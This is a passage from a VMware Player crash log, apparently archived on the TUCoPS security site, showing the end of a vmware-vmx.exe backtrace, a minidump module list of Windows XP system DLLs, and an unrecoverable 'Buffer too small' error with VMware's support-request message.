Mar 15 11:19:18: vmx| backtrace[10] ebp 0x0012f7c4 eip 0x005af9f8 params 0000000000 0x08f0d800 0x08e84780 0000000000 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x001ae9f8] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[11] ebp 0x0012f7e0 eip 0x005af633 params 0x08e84780 0x08f0d800 0x00000143 0000000000 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x001ae633] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[12] ebp 0x0012f804 eip 0x005b8067 params 0x08e84780 0000000000 0x00000012 0x0000000e [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x001b7067] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[13] ebp 0x0012f824 eip 0x00438c3a params 0x0001390c 0x003363b4 0000000000 0x00000011 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00037c3a] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[14] ebp 0x0012fc50 eip 0x0043a474 params 0x003363b0 0x0001390c 0x08e84780 0x08f05f88 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00039474] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[15] ebp 0x0012fc7c eip 0x0043aa36 params 0000000000 0000000000 0000000000 0x000f4240 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00039a36] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[16] ebp 0x0012fc94 eip 0x0043ab49 params 0000000000 0000000000 0000000000 0x08e84780 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00039b49] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[17] ebp 0x0012fcc4 eip 0x004148b1 params 0x08e84780 0x0012fcf8 0x0015234e 0x0012fd14 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x000138b1] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[18] ebp 0x0012fd08 eip 0x00414c0a params 0x00000004 0x0071bf50 0x00152388 0000000000 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00013c0a] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[19] ebp 0x0012ff18 eip 0x00403c56 params 0x00400000 0000000000 0x0015234b 0x0000000a [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00002c56] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[20] ebp 0x0012ffc0 eip 0x00401185 params 0000000000 0x00000030 0x7ffdf000 0xef028cf0 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00000185] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[21] ebp 0x0012fff0 eip 0x77e814c7 params 0x00401000 0000000000 0x78746341 0x00000020 [C:\WINDOWS\system32\kernel32.dll base 0x77e60000 0x0001:0x000204c7] (GetCurrentDirectoryW + 0x0044)=0D
Mar 15 11:19:18: vmx| ----End of backtrace----=0D
Mar 15 11:19:18: vmx| Win32 object usage: GDI 6, USER 2=0D
Mar 15 11:19:18: vmx| W32Util_CoreDump: faking exception to get context=0D
Mar 15 11:19:18: vmx| CoreDump: Writing minidump to C:\Documents and Settings\n00b\Application Data\VMware\vmware-vmx-1372.dmp=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x00400000 size 0x004fc000=0D
Mar 15 11:19:18: vmx|   checksum 0x00000000 timestamp 0x43a85b9f=0D
Mar 15 11:19:18: vmx|   image file C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe=0D
Mar 15 11:19:18: vmx|   file version 1.0.1.19317=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77f50000 size 0x000a7000=0D
Mar 15 11:19:18: vmx|   checksum 0x000a92f6 timestamp 0x3d6dfa28=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\ntdll.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77e60000 size 0x000e6000=0D
Mar 15 11:19:18: vmx|   checksum 0x000e7ed3 timestamp 0x3d6dfa28=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\kernel32.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x7c340000 size 0x00056000=0D
Mar 15 11:19:18: vmx|   checksum 0x0005f1e9 timestamp 0x3e561eac=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\msvcr71.dll=0D
Mar 15 11:19:18: vmx|   file version 7.10.3052.4=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77d40000 size 0x0008c000=0D
Mar 15 11:19:18: vmx|   checksum 0x000936bc timestamp 0x3d6dfa28=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\user32.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77c70000 size 0x00040000=0D
Mar 15 11:19:18: vmx|   checksum 0x0004285c timestamp 0x3d6dfa27=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\gdi32.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77dd0000 size 0x0008d000=0D
Mar 15 11:19:18: vmx|   checksum 0x0009315e timestamp 0x3d6dfa28=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\advapi32.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x78000000 size 0x00086000=0D
Mar 15 11:19:18: vmx|   checksum 0x00084e46 timestamp 0x3d6dfa29=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\rpcrt4.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x771b0000 size 0x00121000=0D
Mar 15 11:19:18: vmx|   checksum 0x00121e6b timestamp 0x3d6dfa22=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\ole32.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x74ae0000 size 0x00007000=0D
Mar 15 11:19:18: vmx|   checksum 0x00009968 timestamp 0x3b7dfe1f=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\cfgmgr32.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.0=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x76670000 size 0x000e7000=0D
Mar 15 11:19:18: vmx|   checksum 0x000e58ec timestamp 0x3d6dfa1e=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\setupapi.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77c10000 size 0x00053000=0D
Mar 15 11:19:18: vmx|   checksum 0x000520bc timestamp 0x3d6dfa27=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\msvcrt.dll=0D
Mar 15 11:19:18: vmx|   file version 7.0.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x71ab0000 size 0x00015000=0D
Mar 15 11:19:18: vmx|   checksum 0x00015647 timestamp 0x3b7dfe31=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\ws2_32.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.0=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x71aa0000 size 0x00008000=0D
Mar 15 11:19:18: vmx|   checksum 0x0000fcb0 timestamp 0x3b7dfe32=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\ws2help.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.0=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77120000 size 0x0008b000=0D
Mar 15 11:19:18: vmx|   checksum 0x000999af timestamp 0x3d6dfa22=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\oleaut32.dll=0D
Mar 15 11:19:18: vmx|   file version 3.50.5016.0=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x72280000 size 0x00028000=0D
Mar 15 11:19:18: vmx|   checksum 0x00026e12 timestamp 0x3d6dfa07=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\dinput.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x76b40000 size 0x0002c000=0D
Mar 15 11:19:18: vmx|   checksum 0x0002f7cc timestamp 0x3d6dfa20=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\winmm.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x51080000 size 0x00061000=0D
Mar 15 11:19:18: vmx|   checksum 0x0006c940 timestamp 0x40ee6b7c=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\dsound.dll=0D
Mar 15 11:19:18: vmx|   file version 5.3.1.904=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77c00000 size 0x00007000=0D
Mar 15 11:19:18: vmx|   checksum 0x00005468 timestamp 0x3b7dfe0f=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\version.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.0=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x5ed00000 size 0x000c6000=0D
Mar 15 11:19:18: vmx|   checksum 0x000ace46 timestamp 0x3d6df9e5=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\opengl32.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x68b20000 size 0x0001e000=0D
Mar 15 11:19:18: vmx|   checksum 0x00025e60 timestamp 0x3b7dfe60=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\glu32.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.0=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x51000000 size 0x00050000=0D
Mar 15 11:19:18: vmx|   checksum 0x00053d78 timestamp 0x40ee6af9=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\ddraw.dll=0D
Mar 15 11:19:18: vmx|   file version 5.3.1.904=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x73bc0000 size 0x00006000=0D
Mar 15 11:19:18: vmx|   checksum 0x0000e03d timestamp 0x3b7dfe25=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\dciman32.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.0=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x76380000 size 0x00005000=0D
Mar 15 11:19:18: vmx|   checksum 0x00006ca4 timestamp 0x3d6dfa1d=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\msimg32.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x690d0000 size 0x0000d000=0D
Mar 15 11:19:18: vmx|   checksum 0x00000000 timestamp 0x43a85ad6=0D
Mar 15 11:19:18: vmx|   image file C:\Program Files\VMware\VMware Player\bin\ntwrap.dll=0D
Mar 15 11:19:18: vmx|   file version 1.0.1.19317=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x76780000 size 0x00008000=0D
Mar 15 11:19:18: vmx|   checksum 0x00008475 timestamp 0x3d6dfa1e=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\shfolder.dll=0D
Mar 15 11:19:18: vmx|   file version 6.0.2800.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x70a70000 size 0x00064000=0D
Mar 15 11:19:18: vmx|   checksum 0x000690c8 timestamp 0x3d6dfa02=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\shlwapi.dll=0D
Mar 15 11:19:18: vmx|   file version 6.0.2800.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x71950000 size 0x000e4000=0D
Mar 15 11:19:18: vmx|   checksum 0x000ea784 timestamp 0x3d6df9b6=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805\comctl32.dll=0D
Mar 15 11:19:18: vmx|   file version 6.0.2800.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x76f90000 size 0x00010000=0D
Mar 15 11:19:18: vmx|   checksum 0x00016fca timestamp 0x3d6dfa22=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\secur32.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x76ce0000 size 0x0001f000=0D
Mar 15 11:19:18: vmx|   checksum 0x0002a43b timestamp 0x3d6dfa21=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\ntmarta.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x76f60000 size 0x0002c000=0D
Mar 15 11:19:18: vmx|   checksum 0x0002d4fa timestamp 0x3d6dfa22=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\wldap32.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x71bf0000 size 0x00011000=0D
Mar 15 11:19:18: vmx|   checksum 0x0000f455 timestamp 0x3d6dfa06=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\samlib.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x76fd0000 size 0x00078000=0D
Mar 15 11:19:18: vmx|   checksum 0x0007d6dd timestamp 0x3b7dfe10=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\clbcatq.dll=0D
Mar 15 11:19:18: vmx|   file version 2001.12.4414.42=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77050000 size 0x000c5000=0D
Mar 15 11:19:18: vmx|   checksum 0x000cd4c3 timestamp 0x3b7dfe10=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\comres.dll=0D
Mar 15 11:19:18: vmx|   file version 2001.12.4414.42=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x74ef0000 size 0x0000a000=0D
Mar 15 11:19:18: vmx|   checksum 0x000084f7 timestamp 0x3d6dfa14=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\wbem\wbemprox.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x75290000 size 0x00038000=0D
Mar 15 11:19:18: vmx|   checksum 0x0003b6a7 timestamp 0x3d6dfa15=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\wbem\wbemcomn.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x74ed0000 size 0x0000f000=0D
Mar 15 11:19:18: vmx|   checksum 0x0001a622 timestamp 0x3b7dfe1d=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\wbem\wbemsvc.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.0=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x75690000 size 0x0008d000=0D
Mar 15 11:19:18: vmx|   checksum 0x00099607 timestamp 0x3d6dfa17=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\wbem\fastprox.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x0ffd0000 size 0x00023000=0D
Mar 15 11:19:18: vmx|   checksum 0x0002a11c timestamp 0x3ccdcab0=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\rsaenh.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1029=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x72d20000 size 0x00009000=0D
Mar 15 11:19:18: vmx|   checksum 0x00007ea6 timestamp 0x3b7dfe2a=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\wdmaud.drv=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.0=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x72d10000 size 0x00008000=0D
Mar 15 11:19:18: vmx|   checksum 0x00005557 timestamp 0x3b7dfe2a=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\msacm32.drv=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.0=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77be0000 size 0x00014000=0D
Mar 15 11:19:18: vmx|   checksum 0x0001695e timestamp 0x3b7dfe0f=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\msacm32.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.0=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x77bd0000 size 0x00007000=0D
Mar 15 11:19:18: vmx|   checksum 0x0000a3bf timestamp 0x3b7dfe0f=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\midimap.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.0=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x0b280000 size 0x000c1000=0D
Mar 15 11:19:18: vmx|   checksum 0x000bd9f7 timestamp 0x3e385156=0D
Mar 15 11:19:18: vmx|   image file C:\Program Files\VMware\VMware Player\dbghelp.dll=0D
Mar 15 11:19:18: vmx|   file version 6.1.17.2=0D
Mar 15 11:19:18: vmx| CoreDump: including module base 0x76bf0000 size 0x0000b000=0D
Mar 15 11:19:18: vmx|   checksum 0x0000fb5a timestamp 0x3d6dfa21=0D
Mar 15 11:19:18: vmx|   image file C:\WINDOWS\system32\psapi.dll=0D
Mar 15 11:19:18: vmx|   file version 5.1.2600.1106=0D
Mar 15 11:19:18: vmx| CoreDump: Including thread 3012=0D
Mar 15 11:19:18: vmx| CoreDump: Including thread 3788=0D
Mar 15 11:19:18: vmx| CoreDump: Including thread 2092=0D
Mar 15 11:19:18: vmx| CoreDump: Including thread 1440=0D
Mar 15 11:19:18: vmx| CoreDump: Including thread 2088=0D
Mar 15 11:19:18: vmx| CoreDump: Including thread 2224=0D
Mar 15 11:19:18: vmx| CoreDump: Including thread 3780=0D
Mar 15 11:19:18: vmx| CoreDump: Including thread 1704=0D
Mar 15 11:19:18: vmx| CoreDump: Including thread 192=0D
Mar 15 11:19:18: vmx| Msg_Post: Error=0D
Mar 15 11:19:18: vmx| [msg.log.error.unrecoverable] VMware Player unrecoverable error: (vmx)=0D
Mar 15 11:19:18: vmx| C:/ob/bora-19317/bora/lib/string/str.c:192 Buffer too small 0x430f6f=0D
Mar 15 11:19:18: vmx| [msg.panic.haveLog] A log file is available in "C:\Documents and Settings\n00b\Desktop\back-track\vmware.log".  [msg.panic.haveCore] A core file is available in "C:\Documents and Settings\n00b\Application Data\VMware\vmware-vmx-1372.dmp".  [msg.panic.requestSupport.withLogAndCore] Please request support and include the contents of the log file and core file.  [msg.panic.requestSupport.win32] =0D
Mar 15 11:19:18: vmx| To collect files to submit to VMware support, run cscript vm-support.vbs.=0D
Mar 15 11:19:18: vmx| [msg.panic.response] We will respond on the basis of your support entitlement=0D
 =0D
=0D
[/code]=0D
 =0D
 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH